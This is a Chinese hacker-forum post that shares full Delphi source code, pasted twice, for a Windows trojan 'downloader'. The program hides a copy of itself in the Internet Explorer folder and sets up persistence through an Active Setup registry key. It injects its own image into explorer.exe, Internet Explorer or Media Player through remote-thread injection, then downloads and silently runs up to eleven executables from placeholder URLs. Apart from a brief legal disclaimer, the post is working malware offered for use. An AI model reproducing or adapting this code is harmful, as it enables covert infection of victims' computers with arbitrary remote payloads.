HanDs
NO.2

[Delphi文章] ActiveX启动下载者 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

program InjectTheSelf;  
 
{$IMAGEBASE $13140000} 
 
uses 
Windows;  
 
var 
//动态加载shell32.dll中的ShellExecuteA函数  
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;  
//动态加载Urlmon.dll中的UrlDownloadToFileA函数  
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;  
hShell,hUrlmon: THandle;  
 
 
//插入IE需要用到的函数  
function GetIEAppPath:string;  
var 
iekey: Hkey;  
iename: array [0..255] of char;  
vType,dLength :DWORD;  
begin 
vType := REG_SZ;  
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);  
dLength := SizeOf(iename);  
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then 
Result := iename  
else 
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';  
RegCloseKey(iekey);  
end;  
//写注册表 用到的函数 为activeX启动准备  
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;  
var 
regkey:hkey;  
begin 
result := false;  
RegCreateKey(key,PChar(subkey),regkey);  
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then 
result := true;  
RegCloseKey(regkey);  
 
end;  
 
//插入media player用到的函数  
function GetwmAppPath:string;  
var 
wmkey: Hkey;  
iename: array [0..255] of char;  
vType,dLength :DWORD;  
begin 
 
vType := REG_SZ;  
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);  
dLength := SizeOf(iename);  
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then 
Result := iename  
else 
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';  
RegCloseKey(wmkey);  
end;  
 
procedure Download; //下载过程  
begin 
LoadLibrary('kernel32.dll');  
LoadLibrary('user32.dll');  
hShell:=LoadLibrary('Shell32.dll');  
hUrlmon:=LoadLibrary('unlmon.dll');  
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');  
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');  
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);  
 
Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);  
 
Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);  
 
Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);  
 
Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);  
 
Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);  
 
Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);  
 
Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);  
 
Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);  
 
Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);  
 
Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);  
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);  
 
 
ExitProcess(0);  
end;  
 
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);  
var 
Module, NewModule: Pointer;  
Size, BytesWritten, TID: longword;  
begin 
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址  
Module := Pointer(GetModuleHandle(nil));  
//得到内存映像的长度  
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +  
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;  
//在Exp进程的内存范围内分配一个足够长度的内存  
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);  
//确定起始基址和内存映像基址的位置  
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);  
//确定上面各项数据后,这里开始进行操作  
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);  
//建立远程线程,至此注入过程完成  
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);   
end;  
 
procedure RunInject(InjType:integer);  
var 
ProcessHandle, PID: longword;  
 
begin 
if InjType=0 then //注入explorer.exe  
begin 
//获取Exp进程的PID码  
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);  
end 
else 
if InjType=3 then //注入 media player  
begin 
winexec(PChar(GetwmAppPath),sw_hide);  
sleep(500);  
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);  
end 
else //注入iexplore.exe  
begin 
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);  
winexec(PChar(GetIEAppPath),sw_hide);  
sleep(500);  
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);  
end;  
//打开进程  
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);  
Inject(ProcessHandle, @Download);  
//关闭对像  
CloseHandle(ProcessHandle);  
end;  
 
 
BEGIN  
 
CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;  
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);  
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',  
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性  
//activex自启动  
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');  
RunInject(0); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player  
end. 

program InjectTheSelf;

{$IMAGEBASE $13140000}

uses
Windows;

var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;


//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);

end;

//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin

vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;

procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('unlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);

Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);

Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);

Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);

Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);

Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);

Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);

Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);

Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);


ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;


BEGIN

CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');
RunInject(0); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
ActiveX 启动下载者
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组